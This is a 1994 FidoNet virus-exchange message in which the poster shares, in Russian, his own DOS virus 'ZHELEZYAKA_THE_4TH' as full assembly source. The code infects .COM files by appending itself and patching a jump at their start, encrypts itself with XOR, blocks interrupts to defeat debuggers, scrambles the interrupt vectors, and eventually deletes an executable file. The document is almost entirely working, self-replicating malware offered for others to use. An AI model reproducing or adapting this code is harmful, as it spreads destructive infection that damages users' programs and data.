
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 1 of 64
; From : MeteO 2:5030/136 Tue 09 Nov 93 08:59
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : ViRii
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : ABC.PVT.HACK (ABC: Хацк...)
;* From : Alexei Galich, 123:1000/6.2 (31 Oct 94 13:44)
;* To : All
;* Subj : ViRii
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;Приветствую Вас, All
;
;Вот вирус написал, страшный, сам писал !
;Наезды принимаются с 1:00-8:00
;
;PS: Ну не знаю я почему он табуляцию не понял, извините.
;
;--------8<-------------------------------------------------------
;
;
; ZHELEZYAKA_THE_4TH
IDEAL
MODEL TINY
CODESEG
ORG 100H
LOCALS
MAIN_BEGIN: JMP VIRUS_START_O
DB 04H,0,' ZHELEZYAKA_THE_4TH ',0
EXIT_ADDRESS EQU 100H
DOS EQU 21H
VIRUS_SIGNATURE EQU 04H
NUM_FIRST_BYTES EQU 4
ALREADY_INFECT EQU 3
COUNTER_ADDR EQU 510H
FALSE_BYTE_ADDR EQU 104H
COM_WILDCARD EQU (COM_WILDCARD_O-VIRUS_START_O)
EXE_WILDCARD EQU (EXE_WILDCARD_O-VIRUS_START_O)
WRITE_BUFFER EQU (WRITE_BUFFER_O-VIRUS_START_O)
ORIGIN_DIR EQU (WRITE_BUFFER+NUM_FIRST_BYTES)
NEW_DTA EQU (ORIGIN_DIR+65)
COPY_BUFFER EQU (NEW_DTA+256)
FALSE_BYTES EQU (COPY_BUFFER+WRITE_BUFFER)
ORIGIN_BEGIN EQU (ORIGIN_BEGIN_O-VIRUS_START_O)
MAIN_PART_LEN EQU (WRITE_BUFFER)
INFECTED_NUMB EQU (INFECTED_NUMB_O-VIRUS_START_O)
XOR_VALUE EQU (XOR_VALUE_O-VIRUS_START_O)
XOR_VAL0 EQU (XOR_VAL0_O-VIRUS_START_O)
XOR_VAL00 EQU (XOR_VAL00_O-VIRUS_START_O)
XOR_VAL1 EQU (XOR_VAL1_O-VIRUS_START_O)
XOR_VAL2 EQU (XOR_VAL2_O-VIRUS_START_O)
XOR_VAL3 EQU (XOR_VAL3_O-VIRUS_START_O)
XOR_VAL4 EQU (XOR_VAL4_O-VIRUS_START_O)
BEGIN_CODING EQU (BEGIN_CODING_O-VIRUS_START_O)
CONT_CODING EQU (CONT_CODING_O-VIRUS_START_O)
MESSAGE EQU (MESSAGE_O-VIRUS_START_O)
DOT EQU (DOT_O-VIRUS_START_O)
VIRUS_START_O: CALL DETECT_BEGIN_O
XOR_VAL0_O DB 0
DETECT_BEGIN_O: POP SI
SUB SI,3 ; SI -  ç «® ¢¨àãá 
JMP SHORT @@0
XOR_VAL00_O DB 0
@@0: LEA DI,[SI+BEGIN_CODING]
CALL CODE
BEGIN_CODING_O =$
MOV CX,NUM_FIRST_BYTES ; ‹¥ç¨¬
LEA DI,[SI+ORIGIN_BEGIN] ; ä ©«
MOV BX,100H ; ¢
MOVE_LOOP: MOV AH,[DI] ; ¯ ¬ïâ¨
MOV [BX],AH ;
INC DI ;
INC BX ;
LOOP MOVE_LOOP ;
LEA DX,[SI+NEW_DTA] ; ‘â ¢¨¬
MOV AH,1AH ; ᢮î
CALL CHECK ; DTA
MOV AH,47H ;
PUSH SI ; ‡ ¯®¬¨­ ¥¬
LEA SI,[SI+ORIGIN_DIR+1] ; ⥪ã騩
CWD ; ª â «®£
CALL CHECK ;
POP SI ;
FIND_FIRST: LEA DX,[SI+COM_WILDCARD] ; <20>®¨áª ¯¥à¢®£®
XOR CX,CX ; COM ä ©« 
MOV AH,4EH ;
FIND_NEXT: INT DOS ;
JNC @@L1 ;
JMP NO_FILES_FOUND ; …᫨ ­¥â, â® ...
@@L1:
LEA DX,[SI+NEW_DTA+1EH] ; Žâªà®¥¬
MOV AX,3D02H ; íâ®â
CALL CHECK ; ä ©«
MOV BX,AX ; <20>à®ç¨â ¥¬
MOV AH,3FH ; ¯¥à¢ë¥ 4
LEA DX,[SI+ORIGIN_BEGIN] ; ¡ ©â 
MOV DI,DX ; ¨§
MOV CX,NUM_FIRST_BYTES ; í⮣®
INT DOS ; ä ©« 
ADD DI,NUM_FIRST_BYTES-1
CMP [BYTE PTR DI],VIRUS_SIGNATURE
JE @@L2
JMP INFECT_FILE
@@L2:
MOV AH,3EH ; ‡ ªà®¥¬
CALL CHECK ; ä ©«
CONT_SEARCHING: MOV AH,4FH ;  ©â¨
JMP FIND_NEXT ; á«¥¤ãî騩 ä ©«
COM_WILDCARD_O DB '*.COM',0
EXE_WILDCARD_O DB '*.E*',0
MESSAGE_O DB 13,10,'ZHELEZYAKA_THE_4TH WITH YOU FOREVER',13,10,'$'
DOT_O DB '..',0
NO_FILES_FOUND: MOV AH,3BH ; ‘¬¥é ¥¬áï
LEA DX,[SI+DOT] ; ­  ª â «®£
INT DOS ; ¢¢¥àå
JC @@L4 ; ¯®ª 
JMP FIND_FIRST ; ¢®§¬®¦­®
@@L4:
XOR AX,AX ;
MOV ES,AX ; “¢¥«¨ç¨¢ ¥¬
MOV DI,COUNTER_ADDR ; áç¥â稪
MOV AX,[ES:DI] ;
INC AL ;
MOV [ES:DI],AX ; —â®
CMP AL,ALREADY_INFECT ; ¡ã¤¥¬
JG INFECT_MORE ; ¤¥« âì?
CMP AH,ALREADY_INFECT-2 ;
JG BANNER ;
JMP EXECUTE_PROG ;
BANNER: XOR AX,AX ; ‘¡à®á áç¥â稪 
MOV [ES:DI],AX
LEA DX,[SI+MESSAGE] ; ‚뢮¤
MOV AH,9 ; á®®¡é¥­¨ï
CALL CHECK ;
MOV CX,5 ;
CONTINUE_NOISE: MOV DL,7 ; <20>¨áª
MOV AH,2 ;
INT DOS ;
LOOP CONTINUE_NOISE
JMP EXECUTE_PROG
INFECT_MORE: XOR AL,AL ; ‘â¨à ­¨¥ ¯¥à¢®£® .E* ä ©« 
INC AH
MOV [ES:DI],AX
LEA DI,[SI+ORIGIN_DIR] ;
MOV [BYTE PTR DI],'\' ; ‚®ááâ ­ ¢«¨¢ ¥¬
MOV AH,3BH ; áâ àë©
XCHG DX,DI ; ª â «®£
INT DOS ;
LEA DX,[SI+EXE_WILDCARD]
XOR CX,CX
MOV AH,4EH
INT DOS
JC EXECUTE_PROG
LEA DX,[SI+NEW_DTA+1EH]
MOV AH,41H
INT 21H
EXECUTE_PROG: MOV DX,80H ; ‘â ¢¨¬
MOV AH,1AH ; áâ àãî
INT DOS ; DTA
LEA DI,[SI+ORIGIN_DIR] ;
MOV [BYTE PTR DI],'\' ; ‚®ááâ ­ ¢«¨¢ ¥¬
MOV AH,3BH ; áâ àë©
XCHG DX,DI ; ª â «®£
INT DOS ;
MOV AX,DS
MOV ES,AX
MOV BP,100H ;
JMP BP ;
INFECT_FILE:
XOR AL,AL ;
MOV AH,[BYTE PTR SI+XOR_VALUE] ;
@@IFZERO: INC AH ;
JZ @@IFZERO ; <20>®¤£®â ¢«¨¢ ¥¬
MOV [BYTE PTR SI+XOR_VALUE],AH ; ­®¢ë©
MOV [SI+XOR_VAL0],AH ; ª®¤
MOV [SI+XOR_VAL00],AH ;
MOV [SI+XOR_VAL1],AH ;
MOV [SI+XOR_VAL2],AH ;
MOV [SI+XOR_VAL3],AH ;
MOV [SI+XOR_VAL4],AH ;
MOV AX,5700H ; ‡ ¯®¬¨­ ¥¬
CALL CHECK ; ¢à¥¬ï
PUSH CX ; ᮧ¤ ­¨ï
PUSH DX ;
XOR CX,CX ; ˆ¤¥¬
XOR DX,DX ; ­ 
MOV AX,4202H ; ª®­¥æ
CALL CHECK ; ä ©« 
SUB AX,3 ; <20>®¤£®â ¢«¨¢ ¥¬
MOV [BYTE PTR SI+WRITE_BUFFER],0E9H ; ­®¢ë¥
MOV [SI+WRITE_BUFFER+1],AX ; 4 ¡ ©â 
MOV [BYTE PTR SI+WRITE_BUFFER+3],VIRUS_SIGNATURE
MOV CX,MAIN_PART_LEN ;
MOV DI,SI ; Š®¯¨à㥬
COPY_LOOP: MOV AH,[DI] ; ¢¨àãá
MOV [DI+COPY_BUFFER],AH ; ¢
INC DI ; ¡ãää¥à
LOOP COPY_LOOP ;
LEA DI,[SI+COPY_BUFFER+BEGIN_CODING] ; Š®¤¨à㥬
CALL CODER_DECODER ; ¥£®
LEA DI,[SI+COPY_BUFFER+CONT_CODING]
CALL FIRST_CODE
MOV CX,MAIN_PART_LEN ; <20>®¤¡¨à ¥¬
MOV AL,[BYTE PTR FALSE_BYTE_ADDR] ; ¤«¨­ã
ADD AL,[FALSE_BYTES] ;
XOR AH,AH ;
ADD CX,AX ; <20>¨è¥¬
LEA DX,[SI+COPY_BUFFER] ; £« ¢­ãî
MOV AH,40H ; ç áâì
INT DOS ; ¢¨àãá 
XOR CX,CX ; ˆ¤¥¬
XOR DX,DX ; ­ 
MOV AX,4200H ; ­ ç «®
CALL CHECK ; ä ©« 
MOV CX,NUM_FIRST_BYTES ; ˆá¯à ¢«ï¥¬
LEA DX,[SI+WRITE_BUFFER] ; ¯¥à¢ë¥
MOV AH,40H ; ¡ ©âë
INT DOS ; ä ©« 
POP DX ; ‚®ááâ ­ ¢«¨¢ ¥¬
POP CX ; ¢à¥¬ï
MOV AX,5701H ; ᮧ¤ ­¨ï
CALL CHECK ;
MOV AH,3EH ; ‡ ªà뢠¥¬
INT DOS ; ä ©«
CALL CODE_INT
JMP EXECUTE_PROG
ORIGIN_BEGIN_O DB 0CDH,20H,90H,90H
CONT_CODING_O =$
CODER_DECODER: MOV CX,CODER_DECODER-BEGIN_CODING_O-1
MOV AH,[SI+XOR_VALUE]
XOR AL,AL
OUT 21H,AL
CODING_LOOP: IN AL,21H
ADD AL,AH
XOR [DI],AL ; ‘ ¬
INC DI ; ª®¤¨à®¢é¨ª
ADD AL,[FALSE_BYTE_ADDR]
OUT 21H,AL ;
LOOP CODING_LOOP ;
XOR AL,AL
OUT 21H,AL
RET
CHECK: PUSH AX ; <20>«®ª¨à®¢ª  ¯à¥à뢠­¨ï
PUSHF
MOV AL,0FEH
OUT 21H,AL
MOV AH,4FH
POPF
POP AX
INT 21H
PUSH AX
PUSHF
IN AL,21H
CMP AL,0FEH
@@HALT: JNE @@HALT
XOR AL,AL
OUT 21H,AL
POPF
POP AX
RET
CODE_INT: XOR AX,AX ; Š®¤¨à®¢ ­¨¥ INT 0 - 3
MOV ES,AX
MOV CX,12
COD_INT_CON: MOV BX,CX
XOR [BYTE PTR ES:BX],10101010B
LOOP COD_INT_CON
PUSH CS
POP ES
RET
; ------------
FIRST_CODE: MOV CX,FIRST_CODE-CODER_DECODER ; <20>।¢ à¨â¥«ì­ë©
MOV AH,[SI+XOR_VALUE] ; ª®¤¨à®¢é¨ª
JMP SHORT FIRST_COD_LOOP
XOR_VAL1_O DB 0
FIRST_COD_LOOP: XOR [DI],AH
INC DI
JMP SHORT @@2
XOR_VAL2_O DB 0
@@2: LOOP FIRST_COD_LOOP
RET
XOR_VALUE_O DB 0
CODE: PUSH DI
LEA DI,[SI+CONT_CODING]
JMP @@3
XOR_VAL3_O DB 0
@@3: CALL FIRST_CODE
MOV AH,40H
JMP @@4
XOR_VAL4_O DB 0
@@4: CALL CHECK ; —â®¡ë ®¡¬ ­ãâì ¯¥à¥å¢ â稪
CALL CODE_INT
POP DI
JMP SHORT CODER_DECODER
WRITE_BUFFER_O =$
END MAIN_BEGIN
;---------------8<-------------------------------------------------
;
;- Все это было бы прикольно, когда бы не было так больно.
;
; -= iR0NMAN =-
;
;-+- GoldED 2.50.B1016+
; + Origin: Œ…HŽŠ€ - <20>Ž <20><>€‡„HˆŠ !!! (123:1000/6.2)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/p Check for code segment overrides in protected mode
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)